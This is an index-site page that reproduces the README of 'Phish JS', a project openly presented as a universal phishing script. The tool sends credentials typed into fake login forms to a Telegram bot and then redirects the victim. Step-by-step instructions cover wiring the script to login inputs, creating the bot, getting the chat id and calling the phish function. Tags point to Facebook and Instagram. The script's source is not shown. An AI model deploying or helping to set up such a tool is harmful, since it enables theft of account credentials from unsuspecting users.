An open API service indexing awesome lists of open source software.

https://github.com/xbaysal11/phish-js

:tropical_fish: Phish JS - Universal phishing script with Telegram bot notification
https://github.com/xbaysal11/phish-js

facebook fish fishjs git hack hacking instagram js phishing phishing-attacks phishing-pages phishing-script phishing-sites phishjs script telegram telegram-bot telegram-bot-api

Last synced: 6 months ago
JSON representation

:tropical_fish: Phish JS - Universal phishing script with Telegram bot notification

Awesome Lists containing this project

README

          


logo

Phish JS


Universal phishing script + Telegram bot notification

[![Privatium](https://img.shields.io/github/license/xbaysal11/privatium)](https://github.com/xbaysal11/phish-js)
[![Github](https://img.shields.io/github/followers/xbaysal11?style=social)](https://github.com/xbaysal11)
[![Privatium](https://img.shields.io/github/stars/xbaysal11/phish-js?style=social)](https://github.com/xbaysal11/phish-js)

---

# Documentation

## 1. Download files or clone
- [Download files](https://github.com/xbaysal11/phish-js/archive/master.zip).

## 2. Put "phish.min.js" file to your project

## 3. Import "phish.min.js"
```

```

## 4. Import "JQuery"
Via [CDN](https://code.jquery.com/) is the quickest and easiest way to get JQuery on your website.

```

```

## 5. Set ids to inputs and button

```

Login
```

## 6. Get TOKEN and CHAT_ID

- 1. Create bot with `@BotFather` and copy bot TOKEN
- 2. Open your bot and type `/start`
- 3. Get chat id here: `https://api.telegram.org/bot/getUpdates`

## 7. Call function

```

$(document).ready(function () {
const BOT_TOKEN = 'your_bot_token',
CHAT_ID = 'your_chat_id',
REDIRECT_URL = 'default_redirect_url'
phish(BOT_TOKEN, CHAT_ID, REDIRECT_URL);
});

```

---

### LICENSE

Phish JS is [MIT licensed.](https://github.com/xbaysal11/phish-js/blob/master/LICENSE)